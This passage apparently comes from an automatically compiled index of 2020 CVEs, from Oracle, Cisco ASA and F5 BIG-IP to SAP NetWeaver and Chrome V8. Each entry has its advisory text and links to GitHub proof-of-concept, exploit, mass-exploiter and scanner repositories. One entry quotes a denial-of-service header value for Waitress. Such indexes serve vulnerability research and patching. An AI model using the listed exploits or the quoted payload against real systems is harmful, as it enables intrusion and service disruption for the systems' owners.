- [FancyDoesSecurity/CVE-2020-2883](https://github.com/FancyDoesSecurity/CVE-2020-2883)
- [Al1ex/CVE-2020-2883](https://github.com/Al1ex/CVE-2020-2883)
- [Qynklee/POC_CVE-2020-2883](https://github.com/Qynklee/POC_CVE-2020-2883)
### CVE-2020-2950 (2020-04-15)
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [tuo4n8/CVE-2020-2950](https://github.com/tuo4n8/CVE-2020-2950)
### CVE-2020-2969 (2020-07-15)
Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
- [emad-almousa/CVE-2020-2969](https://github.com/emad-almousa/CVE-2020-2969)
### CVE-2020-2978 (2020-07-15)
Vulnerability in the Oracle Database - Enterprise Edition component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Oracle Database - Enterprise Edition. While the vulnerability is in Oracle Database - Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database - Enterprise Edition accessible data. CVSS 3.1 Base Score 4.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N).
- [emad-almousa/CVE-2020-2978](https://github.com/emad-almousa/CVE-2020-2978)
### CVE-2020-3153 (2020-02-19)
A vulnerability in the installer component of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated local attacker to copy user-supplied files to system level directories with system level privileges. The vulnerability is due to the incorrect handling of directory paths. An attacker could exploit this vulnerability by creating a malicious file and copying the file to a system directory. An exploit could allow the attacker to copy malicious files to arbitrary locations with system level privileges. This could include DLL pre-loading, DLL hijacking, and other related attacks. To exploit this vulnerability, the attacker needs valid credentials on the Windows system.
- [shubham0d/CVE-2020-3153](https://github.com/shubham0d/CVE-2020-3153)
- [raspberry-pie/CVE-2020-3153](https://github.com/raspberry-pie/CVE-2020-3153)
- [goichot/CVE-2020-3153](https://github.com/goichot/CVE-2020-3153)
### CVE-2020-3161 (2020-04-15)
A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.
- [abood05972/CVE-2020-3161](https://github.com/abood05972/CVE-2020-3161)
### CVE-2020-3187 (2020-05-06)
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.
- [CrackerCat/CVE-2020-3187](https://github.com/CrackerCat/CVE-2020-3187)
- [1337in/CVE-2020-3187](https://github.com/1337in/CVE-2020-3187)
- [sujaygr8/CVE-2020-3187](https://github.com/sujaygr8/CVE-2020-3187)
- [sunyyer/CVE-2020-3187-Scanlist](https://github.com/sunyyer/CVE-2020-3187-Scanlist)
- [Cappricio-Securities/CVE-2020-3187](https://github.com/Cappricio-Securities/CVE-2020-3187)
### CVE-2020-3433 (2020-08-17)
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.
- [goichot/CVE-2020-3433](https://github.com/goichot/CVE-2020-3433)
### CVE-2020-3452 (2020-07-22)
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
- [XDev05/CVE-2020-3452-PoC](https://github.com/XDev05/CVE-2020-3452-PoC)
- [Loneyers/cve-2020-3452](https://github.com/Loneyers/cve-2020-3452)
- [PR3R00T/CVE-2020-3452-Cisco-Scanner](https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner)
- [mr-r3b00t/CVE-2020-3452](https://github.com/mr-r3b00t/CVE-2020-3452)
- [foulenzer/CVE-2020-3452](https://github.com/foulenzer/CVE-2020-3452)
- [Gh0st0ne/http-vuln-cve2020-3452.nse](https://github.com/Gh0st0ne/http-vuln-cve2020-3452.nse)
- [0x5ECF4ULT/CVE-2020-3452](https://github.com/0x5ECF4ULT/CVE-2020-3452)
- [paran0id34/CVE-2020-3452](https://github.com/paran0id34/CVE-2020-3452)
- [murataydemir/CVE-2020-3452](https://github.com/murataydemir/CVE-2020-3452)
- [ludy-dev/Cisco-ASA-LFI](https://github.com/ludy-dev/Cisco-ASA-LFI)
- [3ndG4me/CVE-2020-3452-Exploit](https://github.com/3ndG4me/CVE-2020-3452-Exploit)
- [grim3/CVE-2020-3452](https://github.com/grim3/CVE-2020-3452)
- [cygenta/CVE-2020-3452](https://github.com/cygenta/CVE-2020-3452)
- [darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)
- [fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal](https://github.com/fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal)
- [faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner](https://github.com/faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner)
- [sujaygr8/CVE-2020-3452](https://github.com/sujaygr8/CVE-2020-3452)
- [Aviksaikat/CVE-2020-3452](https://github.com/Aviksaikat/CVE-2020-3452)
- [Veids/CVE-2020-3452_auto](https://github.com/Veids/CVE-2020-3452_auto)
- [iveresk/cve-2020-3452](https://github.com/iveresk/cve-2020-3452)
- [Cappricio-Securities/CVE-2020-3452](https://github.com/Cappricio-Securities/CVE-2020-3452)
### CVE-2020-3580 (2020-10-21)
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
- [Hudi233/CVE-2020-3580](https://github.com/Hudi233/CVE-2020-3580)
- [adarshvs/CVE-2020-3580](https://github.com/adarshvs/CVE-2020-3580)
- [cruxN3T/CVE-2020-3580](https://github.com/cruxN3T/CVE-2020-3580)
- [catatonicprime/CVE-2020-3580](https://github.com/catatonicprime/CVE-2020-3580)
### CVE-2020-3766 (2020-03-25)
Adobe Genuine Integrity Service versions Version 6.4 and earlier have an insecure file permissions vulnerability. Successful exploitation could lead to privilege escalation.
- [hessandrew/CVE-2020-3766_APSB20-12](https://github.com/hessandrew/CVE-2020-3766_APSB20-12)
### CVE-2020-3952 (2020-04-10)
Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.
- [chronoloper/CVE-2020-3952](https://github.com/chronoloper/CVE-2020-3952)
- [bb33bb/CVE-2020-3952](https://github.com/bb33bb/CVE-2020-3952)
- [guardicore/vmware_vcenter_cve_2020_3952](https://github.com/guardicore/vmware_vcenter_cve_2020_3952)
- [gelim/CVE-2020-3952](https://github.com/gelim/CVE-2020-3952)
- [Fa1c0n35/vmware_vcenter_cve_2020_3952](https://github.com/Fa1c0n35/vmware_vcenter_cve_2020_3952)
### CVE-2020-3956 (2020-05-20)
VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.
- [aaronsvk/CVE-2020-3956](https://github.com/aaronsvk/CVE-2020-3956)
### CVE-2020-3992 (2020-10-20)
OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.
- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992)
- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs)
- [vpxuser/VMware-ESXI-OpenSLP-Exploit](https://github.com/vpxuser/VMware-ESXI-OpenSLP-Exploit)
### CVE-2020-4040 (2020-06-08)
Bolt CMS before version 3.7.1 lacked CSRF protection in the preview generating endpoint. Previews are intended to be generated by the admins, developers, chief-editors, and editors, who are authorized to create content in the application. But due to lack of proper CSRF protection, unauthorized users could generate a preview. This has been fixed in Bolt 3.7.1
- [jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041](https://github.com/jpvispo/RCE-Exploit-Bolt-3.7.0-CVE-2020-4040-4041)
### CVE-2020-4276 (2020-03-26)
IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional is vulnerable to a privilege escalation vulnerability when using token-based authentication in an admin request over the SOAP connector. X-Force ID: 175984.
- [mekoko/CVE-2020-4276](https://github.com/mekoko/CVE-2020-4276)
### CVE-2020-4463 (2020-07-29)
IBM Maximo Asset Management 7.6.0.1 and 7.6.0.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 181484.
- [Ibonok/CVE-2020-4463](https://github.com/Ibonok/CVE-2020-4463)
### CVE-2020-4464 (2020-07-17)
IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to execute arbitrary code on a system with a specially-crafted sequence of serialized objects over the SOAP connector. IBM X-Force ID: 181489.
- [silentsignal/WebSphere-WSIF-gadget](https://github.com/silentsignal/WebSphere-WSIF-gadget)
- [yonggui-li/CVE-2020-4464-and-CVE-2020-4450](https://github.com/yonggui-li/CVE-2020-4464-and-CVE-2020-4450)
### CVE-2020-5014 (2021-03-08)
IBM DataPower Gateway V10 and V2018 could allow a local attacker with administrative privileges to execute arbitrary code on the system using a server-side requesr forgery attack. IBM X-Force ID: 193247.
- [copethomas/datapower-redis-rce-exploit](https://github.com/copethomas/datapower-redis-rce-exploit)
### CVE-2020-5236 (2020-02-04)
Waitress version 1.4.2 allows a DOS attack When waitress receives a header that contains invalid characters. When a header like "Bad-header: xxxxxxxxxxxxxxx\x10" is received, it will cause the regular expression engine to catastrophically backtrack causing the process to use 100% CPU time and blocking any other interactions. This allows an attacker to send a single request with an invalid header and take the service offline. This issue was introduced in version 1.4.2 when the regular expression was updated to attempt to match the behaviour required by errata associated with RFC7230. The regular expression that is used to validate incoming headers has been updated in version 1.4.3, it is recommended that people upgrade to the new version of Waitress as soon as possible.
- [motikan2010/CVE-2020-5236](https://github.com/motikan2010/CVE-2020-5236)
### CVE-2020-5245 (2020-02-24)
Dropwizard-Validation before 1.3.19, and 2.0.2 may allow arbitrary code execution on the host system, with the privileges of the Dropwizard service account, by injecting arbitrary Java Expression Language expressions when using the self-validating feature.\n\nThe issue has been fixed in dropwizard-validation 1.3.19 and 2.0.2.
- [LycsHub/CVE-2020-5245](https://github.com/LycsHub/CVE-2020-5245)
### CVE-2020-5248 (2020-05-12)
GLPI before before version 9.4.6 has a vulnerability involving a default encryption key. GLPIKEY is public and is used on every instance. This means anyone can decrypt sensitive data stored using this key. It is possible to change the key before installing GLPI. But on existing instances, data must be reencrypted with the new key. Problem is we can not know which columns or rows in the database are using that; espcially from plugins. Changing the key without updating data would lend in bad password sent from glpi; but storing them again from the UI will work.
- [indevi0us/CVE-2020-5248](https://github.com/indevi0us/CVE-2020-5248)
- [Mkway/CVE-2020-5248](https://github.com/Mkway/CVE-2020-5248)
### CVE-2020-5250 (2020-03-05)
In PrestaShop before version 1.7.6.4, when a customer edits their address, they can freely change the id_address in the form, and thus steal someone else's address. It is the same with CustomerForm, you are able to change the id_customer and change all information of all accounts. The problem is patched in version 1.7.6.4.
- [drkbcn/lblfixer_cve2020_5250](https://github.com/drkbcn/lblfixer_cve2020_5250)
### CVE-2020-5254 (2020-03-10)
In NetHack before 3.6.6, some out-of-bound values for the hilite_status option can be exploited. NetHack 3.6.6 resolves this issue.
- [dpmdpm2/CVE-2020-5254](https://github.com/dpmdpm2/CVE-2020-5254)
### CVE-2020-5260 (2020-04-14)
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.
- [brompwnie/cve-2020-5260](https://github.com/brompwnie/cve-2020-5260)
- [Asgavar/CVE-2020-5260](https://github.com/Asgavar/CVE-2020-5260)
- [sv3nbeast/CVE-2020-5260](https://github.com/sv3nbeast/CVE-2020-5260)
### CVE-2020-5267 (2020-03-19)
In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks. The issue is fixed in versions 6.0.2.2 and 5.2.4.2.
- [GUI/legacy-rails-CVE-2020-5267-patch](https://github.com/GUI/legacy-rails-CVE-2020-5267-patch)
### CVE-2020-5377 (2020-07-28)
Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station.
- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)
- [h3xcr4ck3r/CVE-2020-5377](https://github.com/h3xcr4ck3r/CVE-2020-5377)
### CVE-2020-5398 (2020-01-16)
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input.
- [motikan2010/CVE-2020-5398](https://github.com/motikan2010/CVE-2020-5398)
### CVE-2020-5410 (2020-06-02)
Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
- [dead5nd/config-demo](https://github.com/dead5nd/config-demo)
- [osamahamad/CVE-2020-5410-POC](https://github.com/osamahamad/CVE-2020-5410-POC)
### CVE-2020-5421 (2020-09-19)
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.
- [pandaMingx/CVE-2020-5421](https://github.com/pandaMingx/CVE-2020-5421)
### CVE-2020-5504 (2020-01-09)
In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A malicious user could inject custom SQL in place of their own username when creating queries to this page. An attacker must have a valid MySQL account to access the server.
- [xMohamed0/CVE-2020-5504-phpMyAdmin](https://github.com/xMohamed0/CVE-2020-5504-phpMyAdmin)
### CVE-2020-5752 (2020-05-21)
Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges.
- [yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-](https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-)
### CVE-2020-5837 (2020-05-11)
Symantec Endpoint Protection, prior to 14.3, may not respect file permissions when writing to log files that are replaced by symbolic links, which can lead to a potential elevation of privilege.
- [RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write](https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write)
### CVE-2020-5839 (2020-07-08)
Symantec Endpoint Detection And Response, prior to 4.4, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.
- [nasbench/CVE-2020-5839](https://github.com/nasbench/CVE-2020-5839)
### CVE-2020-5842 (2020-01-07)
Codoforum 4.8.3 allows XSS in the user registration page: via the username field to the index.php?u=/user/register URI. The payload is, for example, executed on the admin/index.php?page=users/manage page.
- [prasanthc41m/codoforum](https://github.com/prasanthc41m/codoforum)
### CVE-2020-5844 (2020-03-16)
index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.
- [TheCyberGeek/CVE-2020-5844](https://github.com/TheCyberGeek/CVE-2020-5844)
- [UNICORDev/exploit-CVE-2020-5844](https://github.com/UNICORDev/exploit-CVE-2020-5844)
### CVE-2020-5902 (2020-07-01)
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
- [dwisiswant0/CVE-2020-5902](https://github.com/dwisiswant0/CVE-2020-5902)
- [aqhmal/CVE-2020-5902-Scanner](https://github.com/aqhmal/CVE-2020-5902-Scanner)
- [jas502n/CVE-2020-5902](https://github.com/jas502n/CVE-2020-5902)
- [ar0dd/CVE-2020-5902](https://github.com/ar0dd/CVE-2020-5902)
- [yassineaboukir/CVE-2020-5902](https://github.com/yassineaboukir/CVE-2020-5902)
- [rwincey/CVE-2020-5902-NSE](https://github.com/rwincey/CVE-2020-5902-NSE)
- [un4gi/CVE-2020-5902](https://github.com/un4gi/CVE-2020-5902)
- [nsflabs/CVE-2020-5902](https://github.com/nsflabs/CVE-2020-5902)
- [yasserjanah/CVE-2020-5902](https://github.com/yasserjanah/CVE-2020-5902)
- [JSec1337/RCE-CVE-2020-5902](https://github.com/JSec1337/RCE-CVE-2020-5902)
- [dunderhay/CVE-2020-5902](https://github.com/dunderhay/CVE-2020-5902)
- [r0ttenbeef/cve-2020-5902](https://github.com/r0ttenbeef/cve-2020-5902)
- [sv3nbeast/CVE-2020-5902_RCE](https://github.com/sv3nbeast/CVE-2020-5902_RCE)
- [cybersecurityworks553/scanner-CVE-2020-5902](https://github.com/cybersecurityworks553/scanner-CVE-2020-5902)
- [lijiaxing1997/CVE-2020-5902-POC-EXP](https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP)
- [qlkwej/poc-CVE-2020-5902](https://github.com/qlkwej/poc-CVE-2020-5902)
- [Zinkuth/F5-BIG-IP-CVE-2020-5902](https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902)
- [0xAbdullah/CVE-2020-5902](https://github.com/0xAbdullah/CVE-2020-5902)
- [jinnywc/CVE-2020-5902](https://github.com/jinnywc/CVE-2020-5902)
- [GoodiesHQ/F5-Patch](https://github.com/GoodiesHQ/F5-Patch)
- [jiansiting/CVE-2020-5902](https://github.com/jiansiting/CVE-2020-5902)
- [wdlid/CVE-2020-5902-fix](https://github.com/wdlid/CVE-2020-5902-fix)
- [Any3ite/CVE-2020-5902-F5BIG](https://github.com/Any3ite/CVE-2020-5902-F5BIG)
- [k3nundrum/CVE-2020-5902](https://github.com/k3nundrum/CVE-2020-5902)
- [inho28/CVE-2020-5902-F5-BIGIP](https://github.com/inho28/CVE-2020-5902-F5-BIGIP)
- [cristiano-corrado/f5_scanner](https://github.com/cristiano-corrado/f5_scanner)
- [ajdumanhug/CVE-2020-5902](https://github.com/ajdumanhug/CVE-2020-5902)
- [zhzyker/CVE-2020-5902](https://github.com/zhzyker/CVE-2020-5902)
- [GovindPalakkal/EvilRip](https://github.com/GovindPalakkal/EvilRip)
- [dnerzker/CVE-2020-5902](https://github.com/dnerzker/CVE-2020-5902)
- [renanhsilva/checkvulnCVE20205902](https://github.com/renanhsilva/checkvulnCVE20205902)
- [halencarjunior/f5scan](https://github.com/halencarjunior/f5scan)
- [deepsecurity-pe/GoF5-CVE-2020-5902](https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902)
- [Shu1L/CVE-2020-5902-fofa-scan](https://github.com/Shu1L/CVE-2020-5902-fofa-scan)
- [d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter](https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter)
- [TheCyberViking/CVE-2020-5902-Vuln-Checker](https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker)
- [MrCl0wnLab/checker-CVE-2020-5902](https://github.com/MrCl0wnLab/checker-CVE-2020-5902)
- [qiong-qi/CVE-2020-5902-POC](https://github.com/qiong-qi/CVE-2020-5902-POC)
- [theLSA/f5-bigip-rce-cve-2020-5902](https://github.com/theLSA/f5-bigip-rce-cve-2020-5902)
- [flyopenair/CVE-2020-5902](https://github.com/flyopenair/CVE-2020-5902)
- [Al1ex/CVE-2020-5902](https://github.com/Al1ex/CVE-2020-5902)
- [freeFV/CVE-2020-5902-fofa-scan](https://github.com/freeFV/CVE-2020-5902-fofa-scan)
- [momika233/cve-2020-5902](https://github.com/momika233/cve-2020-5902)
- [rockmelodies/CVE-2020-5902-rce-gui](https://github.com/rockmelodies/CVE-2020-5902-rce-gui)
- [f5devcentral/cve-2020-5902-ioc-bigip-checker](https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker)
- [corelight/CVE-2020-5902-F5BigIP](https://github.com/corelight/CVE-2020-5902-F5BigIP)
- [PushpenderIndia/CVE-2020-5902-Scanner](https://github.com/PushpenderIndia/CVE-2020-5902-Scanner)
- [murataydemir/CVE-2020-5902](https://github.com/murataydemir/CVE-2020-5902)
- [superzerosec/cve-2020-5902](https://github.com/superzerosec/cve-2020-5902)
- [ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability](https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability)
- [faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner](https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner)
- [haisenberg/CVE-2020-5902](https://github.com/haisenberg/CVE-2020-5902)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [z3n70/CVE-2020-5902](https://github.com/z3n70/CVE-2020-5902)
- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)
- [amitlttwo/CVE-2020-5902](https://github.com/amitlttwo/CVE-2020-5902)
### CVE-2020-5903 (2020-07-01)
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, a Cross-Site Scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility.
- [ltvthang/CVE-2020-5903](https://github.com/ltvthang/CVE-2020-5903)
### CVE-2020-6207 (2020-03-10)
SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.
- [chipik/SAP_EEM_CVE-2020-6207](https://github.com/chipik/SAP_EEM_CVE-2020-6207)
### CVE-2020-6286 (2020-07-14)
The insufficient input path validation of certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal.
- [murataydemir/CVE-2020-6286](https://github.com/murataydemir/CVE-2020-6286)
### CVE-2020-6287 (2020-07-14)
SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.
- [chipik/SAP_RECON](https://github.com/chipik/SAP_RECON)
- [duc-nt/CVE-2020-6287-exploit](https://github.com/duc-nt/CVE-2020-6287-exploit)
- [Onapsis/CVE-2020-6287_RECON-scanner](https://github.com/Onapsis/CVE-2020-6287_RECON-scanner)
- [ynsmroztas/CVE-2020-6287-Sap-Add-User](https://github.com/ynsmroztas/CVE-2020-6287-Sap-Add-User)
- [murataydemir/CVE-2020-6287](https://github.com/murataydemir/CVE-2020-6287)
- [qmakake/SAP_CVE-2020-6287_find_mandate](https://github.com/qmakake/SAP_CVE-2020-6287_find_mandate)
- [dylvie/CVE-2020-6287_SAP-NetWeaver-bypass-auth](https://github.com/dylvie/CVE-2020-6287_SAP-NetWeaver-bypass-auth)
### CVE-2020-6308 (2020-10-20)
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
- [InitRoot/CVE-2020-6308-PoC](https://github.com/InitRoot/CVE-2020-6308-PoC)
- [freeFV/CVE-2020-6308-mass-exploiter](https://github.com/freeFV/CVE-2020-6308-mass-exploiter)
- [TheMMMdev/CVE-2020-6308](https://github.com/TheMMMdev/CVE-2020-6308)
- [MachadoOtto/sap_bo_launchpad-ssrf-timing_attack](https://github.com/MachadoOtto/sap_bo_launchpad-ssrf-timing_attack)
### CVE-2020-6364 (2020-10-15)
SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager,leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability.
- [gquere/CVE-2020-6364](https://github.com/gquere/CVE-2020-6364)
### CVE-2020-6418 (2020-02-27)
Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [ChoKyuWon/CVE-2020-6418](https://github.com/ChoKyuWon/CVE-2020-6418)
- [Goyotan/CVE-2020-6418-PoC](https://github.com/Goyotan/CVE-2020-6418-PoC)
- [ulexec/ChromeSHELFLoader](https://github.com/ulexec/ChromeSHELFLoader)
